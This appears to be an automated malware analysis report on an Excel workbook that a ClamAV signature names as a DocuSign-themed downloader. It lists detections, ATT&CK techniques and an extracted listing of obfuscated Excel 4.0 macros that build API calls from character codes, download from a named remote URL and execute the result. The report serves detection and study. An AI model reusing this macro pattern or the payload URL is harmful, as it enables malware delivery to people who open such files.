Malicious Office (OLE) / .XLS — malware analysis report

Static analysis result for SHA-256 00b38c5b4573bf08…

MALICIOUS

Office (OLE) / .XLS

331.0 KB Created: 2006-09-16 00:00:00 Authoring application: Microsoft Excel
MD5: d4584f276e77f03d4039a6fc667fcfdb SHA-1: b79d28ee7d552b522124e3cc97cf395bbbb63d98 SHA-256: 00b38c5b4573bf0810788d5cb3a4b740e80754fed3c633c0124f14a458a49545
302 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1059.001 PowerShell T1566.001 Spearphishing Attachment T1059 Command and Scripting Interpreter

The sample contains Excel 4.0 macros, including an Auto_Open function that utilizes the RUN command to execute a formula. This formula constructs a CALL to 'kernel32.dll' and 'crypt32.dll' with parameters derived from concatenated strings and potentially obfuscated values. The macro also explicitly references the URL 'https://shmncbd.com/ds/231120.gif', indicating its purpose is to download a second-stage payload. The ClamAV detection 'Doc.Downloader.Docusign0521-9864805-0' further supports its role as a downloader.

Heuristics 7

  • ClamAV: Doc.Downloader.Docusign0521-9864805-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Docusign0521-9864805-0
  • Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAME
    oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
  • XLM Auto_Open with dangerous formula APIs critical OLE_XLM_DANGEROUS_FN
    Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
  • URL reconstructed from XLM cell array (1 URL) critical OLE_XLM_CELL_ARRAY_URL
    Excel 4.0 macro sheet stages its payload URL across the BIFF8 Shared String Table (one quoted-char SST entry concatenated with & at runtime), across individual numeric cells (one ASCII charcode per cell), or split across multi-char fragment cells a download formula concatenates by reference (=A1&A2&… / CONCATENATE(...)). The reconstructed URL is invisible to literal-bytes URL extraction because it is never contiguous in the workbook stream. URLs were recovered by walking the BIFF8 record stream and decoding SST entries, LABELSST/RK/NUMBER cells, and FORMULA cell-reference concatenation in token order.
  • Reference to ShellExecute API high SC_STR_SHELLEXEC
    Reference to ShellExecute API
  • Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPEN
    Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL https://shmncbd.com/ds/231120.gif Referenced by macro
    • https://shmncbd.com/ds/231120.gif�Referenced by macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
xlm_macros.txt
235e5c8d20c84fa7e893c28de1bcc715b3fa59f4feb5de8e7a84ebbe334d22cc		 xlm-macro oletools.olevba.extract_all_macros (XLM macro listing) 6059 bytes
Preview script
First 1,000 lines of the extracted script
' 0085     16 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible -  DocuSig
' 0085     18 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible -    8 
' 0085     18 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible -    8 
' 0085     18 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible -    8 
' 0085     18 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible -    8 
' 0085     18 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible -    8 
' 0018     23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d    8 !A40 
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' Sheet,Reference,Formula,Value
'    8 ,A51,RUN(R59),""
'    8 ,R59,RUN(   8 !D50),""
'    8 ,M66,"CALL("Ke"& DocuSig!BW64&"32","Cr"& DocuSig!BY92&"yA","JCJ", DocuSig!BN62& DocuSig!BN77,0)",""
'    8 ,M67,RUN(   8 !A50),""
'    8 ,B98,"https://shmncbd.com/ds/231120.gif",""
'    8 ,BN62,"CONCATENATE(BN63,BN64,BN65,BN66,BN67,BN68,BN69,BN70,BN71)",""
'    8 ,BN63,CHAR(BO63+BP63+BQ63),""
'    8 ,BN64,CHAR(BO64+BP64+BQ64),""
'    8 ,BW64,CONCATENATE(BW67&BW68&BW69&BW70),""
'    8 ,BN65,CHAR(BO65+BP65+BQ65),""
'    8 ,BW65,CHAR(BX65+BY65+BZ65),""
'    8 ,BN66,CHAR(BO66+BP66-BQ66),""
'    8 ,BW66,CHAR(BX66+BY66+BZ66),""
'    8 ,BN67,CHAR(BO67+BP67-BQ67),""
'    8 ,BW67,CHAR(BX67+BY67+BZ67),""
'    8 ,BN68,CHAR(BO68+BP68-BQ68),""
'    8 ,BW68,CHAR(BX68+BY68+BZ68),""
'    8 ,BN69,CHAR(BO69-BP69+BQ69),""
'    8 ,BW69,CHAR(BX69-BY69-BZ69),""
'    8 ,BN70,CHAR(BO70-BP70+BQ70),""
'    8 ,BW70,CHAR(BX70-BY70-BZ70),""
'    8 ,BN71,CHAR(BO71-BP71+BQ71),""
'    8 ,BW71,CHAR(BX71-BY71+BZ71),""
'    8 ,BW72,CHAR(BX72-BY72+BZ72),""
'    8 ,BN77,"CONCATENATE(BN78,BN79,BN80,BN81,BN82,BN83,BN84)",""
'    8 ,BN78,CHAR(BO78-BP78-BQ78),""
'    8 ,BN79,CHAR(BO79-BP79-BQ79),""
'    8 ,BN80,CHAR(BO80-BP80-BQ80),""
'    8 ,BN81,CHAR(BO81-BP81+BQ81),""
'    8 ,BN82,CHAR(BO82-BP82+BQ82),""
'    8 ,BY82,"CONCATENATE(BY84,BY85,BY86,BY87,BY88)",""
'    8 ,BN83,CHAR(BO83-BP83+BQ83),""
'    8 ,BY83,CHAR(BZ83+CA83+CB83),""
'    8 ,BN84,CHAR(BO84-BP84+BQ84),""
'    8 ,BY84,CHAR(BZ84+CA84+CB84),""
'    8 ,BY85,CHAR(BZ85+CA85+CB85),""
'    8 ,BY86,CHAR(BZ86-CA86-CB86),""
'    8 ,BY87,CHAR(BZ87-CA87-CB87),""
'    8 ,BY88,CHAR(BZ88-CA88-CB88),""
'    8 ,BN91,"CONCATENATE(BN92,BN93,BN94,BN95,BN96,BN97,BN98,BN99,BN100,BN101,BN102,BN103,BN104)",""
'    8 ,BN92,[],""
'    8 ,BY92,"CONCATENATE(BY95,BY96,BY97,BY98&"D"&   8 !K75,   8 !K76,   8 !K77,   8 !K78,   8 !K79,   8 !K80,   8 !K81)",""
'    8 ,BN93,[],""
'    8 ,BY93,CHAR(BZ93+CA93+CB93),""
'    8 ,BN94,[],""
'    8 ,BS94,CONCATENATE(BS95&BS96&BS97&BS98),""
'    8 ,BY94,CHAR(BZ94+CA94+CB94),""
'    8 ,BN95,[],""
'    8 ,BS95,CHAR(BT95+BU95-BV95),""
'    8 ,BY95,CHAR(101),""
'    8 ,BN96,[],""
'    8 ,BS96,CHAR(BT96+BU96-BV96),""
'    8 ,BY96,CHAR(BZ96+CA96+CB96),""
'    8 ,BN97,[],""
'    8 ,BS97,CHAR(BT97-BU97+BV97),""
'    8 ,BY97,CHAR(BZ97-CA97-CB97),""
'    8 ,BN98,[],""
'    8 ,BS98,CHAR(BT98-BU98+BV98),""
'    8 ,BY98,CHAR(BZ98-CA98-CB98),""
'    8 ,BN99,[],""
'    8 ,BY99,CHAR(BZ99-CA99-CB99),""
'    8 ,BN100,[],""
'    8 ,BN101,[],""
'    8 ,BN102,[],""
'    8 ,BN103,[],""
'    8 ,BN104,[],""
'    8 ,BR126,CONCATENATE(BR127&BR128&BR129&BR130&BR131&BR132&BR133),""
'    8 ,BR127,CHAR(BS127+BT127+BU127),""
'    8 ,BR128,CHAR(BS128+BT128+BU128),""
'    8 ,BR129,CHAR(BS129+BT129+BU129),""
'    8 ,BR130,CHAR(BS130+BT130+BU130),""
'    8 ,BR131,CHAR(BS131-BT131-BU131),""
'    8 ,BR132,CHAR(BS132-BT132-BU132),""
'    8 ,BR133,CHAR(BS133-BT133-BU133),""
'    8 ,W36,"CONCATENATE(W37,W38,W39,W40,W41,W42,W43,W44,W45,W46,W47,W48)",""
'    8 ,W37,[],""
'    8 ,W38,[],""
'    8 ,W39,[],""
'    8 ,W40,[],""
'    8 ,W41,[],""
'    8 ,W42,[],""
'    8 ,W43,[],""
'    8 ,W44,[],""
'    8 ,W45,[],""
'    8 ,W46,[],""
'    8 ,W47,[],""
'    8 ,W48,[],""
'    8 ,N62,"CONCATENATE("S"&N64,N65,N66,N67,N68&S76)",""
'    8 ,N63,CHAR(O63+P63+Q63),""
'    8 ,N64,CHAR(O64+P64+Q64),""
'    8 ,N65,CHAR(O65+P65+Q65),""
'    8 ,N66,CHAR(O66-P66-Q66),""
'    8 ,N67,CHAR(O67-P67-Q67),""
'    8 ,N68,CHAR(O68-P68-Q68),""
'    8 ,K75,CHAR(L75-M75-N75),""
'    8 ,K76,CHAR(L76+M76-N76),""
'    8 ,S76,"CONCATENATE(S77,S78,S79,S80,S81,S82&"A")",""
'    8 ,K77,CHAR(L77+M77-N77),""
'    8 ,S77,CHAR(T77-U77-V77),""
'    8 ,K78,CHAR(99),""
'    8 ,S78,CHAR(T78-U78+V78),""
'    8 ,K79,CHAR(L79+M79-N79),""
'    8 ,S79,CHAR(T79-U79+V79),""
'    8 ,K80,CHAR(L80-M80+N80),""
'    8 ,S80,CHAR(T80-U80+V80),""
'    8 ,K81,CHAR(L81-M81+N81),""
'    8 ,S81,CHAR(T81+U81-V81),""
'    8 ,S82,CHAR(T82+U82-V82),""
'    8 ,S83,CHAR(T83+U83-V83),""
'    8 ,D50,"CALL("Ke"& DocuSig!BW64&"32","Cr"& DocuSig!BY92&"yA","JCJ", DocuSig!BN62,0)",""
'    8 ,D51,RUN(   8 !M66),""
'    8 ,E65,"CONCATENATE(E67,E68,E69,E70,E71,E72,E73,E74,E75,E76,E77,E78,E79,E80,E81,E82,E83)",""
'    8 ,E66,"CHAR(SUM(F66,G66,H66))",""
'    8 ,E67,"CHAR(SUM(F67,G67,H67))",""
'    8 ,E68,"CHAR(SUM(F68,G68,H68))",""
'    8 ,E69,CHAR(F69-G69-H69),""
'    8 ,E70,CHAR(F70-G70-H70),""
'    8 ,E71,CHAR(F71-G71-H71),""
'    8 ,E72,CHAR(F72+G72-H72),""
'    8 ,E73,CHAR(F73+G73-H73),""
'    8 ,E74,CHAR(F74+G74-H74),""
'    8 ,E75,CHAR(F75-G75+H75),""
'    8 ,E76,CHAR(F76-G76+H76),""
'    8 ,E77,CHAR(F77-G77+H77),""
'    8 ,E78,"CHAR(SUM(F78,G78,H78))",""
'    8 ,E79,"CHAR(SUM(F79,G79,H79))",""
'    8 ,E80,"CHAR(SUM(F80,G80,H80))",""
'    8 ,E81,CHAR(F81-G81-H81),""
'    8 ,E82,CHAR(F82-G82-H82),""
'    8 ,E83,CHAR(F83-G83-H83),""
'    8 ,A50,"CALL("U"& DocuSig!BY82,"U"&   8 !E65,"IICCII",0,   8 !B98, DocuSig!BN62& DocuSig!BN77& DocuSig!BN91,0,0)",""
'    8 ,A51,EXEC(   8 !W36& DocuSig!BN62& DocuSig!BN77& DocuSig!BN91),""
'    8 ,A52,HALT(),""

Open this report in the interactive analyzer, or submit your own file for analysis.